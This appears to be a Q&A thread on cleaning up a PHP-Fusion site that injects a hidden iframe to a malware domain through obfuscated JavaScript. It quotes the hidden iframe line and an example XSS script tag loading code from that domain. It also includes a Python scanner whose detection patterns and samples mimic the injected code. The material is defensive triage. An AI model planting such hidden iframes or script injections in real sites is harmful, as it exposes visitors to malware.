Some friends of mine have a website (www.kennelsoffie.dk) and I'm trying to help them when there is any trouble. However, this time I can't figure it out. When I visit the site using Google Chrome, I'm presented with a warning page claiming that the page that I'm trying to visit contains elements from stopssse.info.

I don't know any PHP, so I simply downloaded the complete website including backups of the database (which are .sql files). Then, I searched all the files for stopssse, but I didn't find anything.

I also tested the site with siteadvisor.com; it says "We tested this site and didn't find any significant problems".

Can PHP hide a reference to the malware site so I can't find it with a simple search? If so, how can you find it?

CruelIO

8 Answers

I found this in the generated source

<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">

It was right below the body tag; it's not in the actual page source, it's being added by obfuscated JavaScript.

edit: if you look at the bottom of http://www.kennelsoffie.dk/includes/jscript.js you'll see a really odd-looking JavaScript function. That's the obfuscated JavaScript function I was telling you about. It starts with

function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var

Best bet is to find and remove it.

  • +1 Definitely the culprit. Want to remove it and also, importantly, find out how it got in there. – Mark Davidson Sep 01 '09 at 12:57
  • Yes, good point. I imagine that because it's powered by PHP-Fusion there is some security hole in the product itself; it's worth checking whether your version is up to date. You may also be able to replace all the files with the exception of the main configuration file without losing any content. –  Sep 01 '09 at 13:07
  • Thank you very much. That did the trick. How did you see the generated source? If I right click in the browser and pick show source I didn't see that part of the code. – CruelIO Sep 01 '09 at 14:56
  • Web Developer toolbar in Firefox allows you to see the generated source code. – Mark Davidson Sep 01 '09 at 16:00
  • Firebug is also quite useful for that. –  Sep 02 '09 at 09:47
You are most probably dealing with XSS attacks.

In that case, two steps:

  • Scan the DB, looking for "scripts" tags, and get rid of them.
  • Hire a guy who knows PHP to fix the holes in your data input and set some efficient sanitizing policy.
e-satis

The malware might not be on the site, but might be coming from material brought in from external sources, such as advertisements.

Thomas Owens

If the site was "infected" via cross-site scripting, then what you have is probably a user-submitted comment somewhere that contains something like this:

<SCRIPT SRC="http://stopssse.info/malware.js"></SCRIPT>

But note that there are many variations that attempt to hide the fact that an external script is executed, and which may also modify the source URL, causing your simple string search to fail.
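The answers above (the obfuscated function at the bottom of jscript.js, and script tags written so that a plain string search misses them) both come down to the same triage problem: grepping for "stopssse" finds nothing because the reference is assembled at runtime. As an added example, not code from any answer on this page, here is a small Python scanner that walks a downloaded site tree (the .sql dumps included) and flags the traits the injected code had rather than the domain name. The file names and sample contents are constructed; the long identifier is the one quoted in the accepted answer, and example.com stands in for the script host.

```python
import re
import tempfile
from pathlib import Path

# Heuristics for triaging a downloaded site tree; a hit means "read this by hand".
PATTERNS = {
    # Long identifiers made only of l/I/O/0/1, the style of the injected function.
    "confusable-identifier": re.compile(r"\b[lIO01]{20,}\b"),
    # Primitives nearly every JavaScript obfuscator ends with.
    "decoder-call": re.compile(r"\b(?:eval|unescape|String\.fromCharCode)\s*\("),
    # Eight or more consecutive %xx or \xNN escapes: a string hidden from grep.
    "escaped-string": re.compile(r"(?:%[0-9a-fA-F]{2}){8,}|(?:\\x[0-9a-fA-F]{2}){8,}"),
    # A zero-size or invisible iframe, in HTML or inside a JavaScript string.
    "hidden-iframe": re.compile(r"<iframe[^>]*(?:height\s*=\s*[\"']?0\b|width\s*=\s*[\"']?0\b|visibility\s*:\s*hidden)", re.I),
    # A script tag that loads code from another host (also catches DB dump rows).
    "external-script": re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//", re.I),
}
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm", ".sql"}

def scan_text(text):
    # Sorted names of every heuristic that fires on the text.
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))

def scan_tree(root):
    """Map each suspicious file under `root` (relative POSIX path) to its findings."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed samples: injected-style JS, an injected SQL dump row (placeholder host), a clean file.
SAMPLES = {
    "includes/jscript.js": (
        "function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il)"
        "{var s=unescape('%3c%69%66%72%61%6d%65%20%68%65%69%67%68%74%3d%30');eval(s);}"),
    "backup/db.sql": "INSERT INTO comments VALUES (1, '<SCRIPT SRC=\"http://example.com/x.js\"></SCRIPT>');",
    "includes/theme.php": "<?php echo '<div class=\"footer\">ok</div>'; ?>",
}

def demo():
    # Write the samples to a temporary directory, scan it, and return the report.
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLES.items():
            Path(tmp, rel).parent.mkdir(parents=True, exist_ok=True)
            Path(tmp, rel).write_text(body)
        return scan_tree(tmp)
```

Point scan_tree at the unpacked site download; every file it lists is one to open and read, and a clean tree with no hits is a sign the injection lives somewhere else (a template row in the database, or content pulled from another host).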


The version of PHP-Fusion that's running on the site appears to be v6.01.3, which looks to be a pretty old version, so it would probably be a good idea to upgrade that.

There seems to have been quite a few security advisories for PHP-Fusion, including a number of SQL injections issues.

Full list of advisories for PHP-Fusion here: http://secunia.com/advisories/product/5291/?task=advisories

Vex

Look for any peculiar files in the actual directories. There may be a file that was uploaded via an insecure upload form that writes additional data to the output. Tell your friend to change his account information, and start reviewing the security of his site.

Sampson

It's there, check the PHP files (search for stopssse).

Alix Axel

In the general case, looking for obfuscated JavaScript, this tool is often useful: Wepawet

Tom Newton